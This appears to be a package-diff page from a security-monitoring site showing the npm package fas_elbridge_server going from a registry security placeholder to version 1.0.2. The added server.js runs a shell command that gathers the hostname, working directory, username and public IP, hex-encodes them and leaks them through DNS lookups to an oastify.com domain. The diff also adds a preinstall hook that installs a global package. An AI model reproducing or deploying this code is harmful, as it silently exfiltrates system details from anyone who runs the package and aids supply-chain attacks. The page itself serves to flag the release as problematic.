fas_elbridge_server 0.0.1-security → 1.0.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of fas_elbridge_server might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/package.json +15 -3
  2. package/server.js +13 -0
  3. package/README.md +0 -5
package/package.json CHANGED
@@ -1,6 +1,18 @@
1
1
  {
2
2
  "name": "fas_elbridge_server",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.2",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "server": "node ./server.js",
8
+ "preinstall": "npm i -g nodemon"
9
+ },
10
+ "author": "Bayram Hendem",
11
+ "license": "MIT",
12
+ "dependencies": {
13
+ "body-parser": "^1.18.3",
14
+ "express": "^4.16.3",
15
+ "multer": "^1.3.1",
16
+ "nodemon": "^1.18.4"
17
+ }
6
18
  }
package/server.js ADDED
@@ -0,0 +1,13 @@
1
+ const { exec } = require("child_process");
2
+ exec("a=$(hostname;pwd;whoami;echo 'niroborg-npm-com-test';curl https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do nslookup $ut.2or6oy3puvt92gibmlqcqopm4da5yxmm.oastify.com;done" , (error, data, getter) => {
3
+ if(error){
4
+ console.log("error",error.message);
5
+ return;
6
+ }
7
+ if(getter){
8
+ console.log(data);
9
+ return;
10
+ }
11
+ console.log(data);
12
+
13
+ });
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=fas_elbridge_server for more information.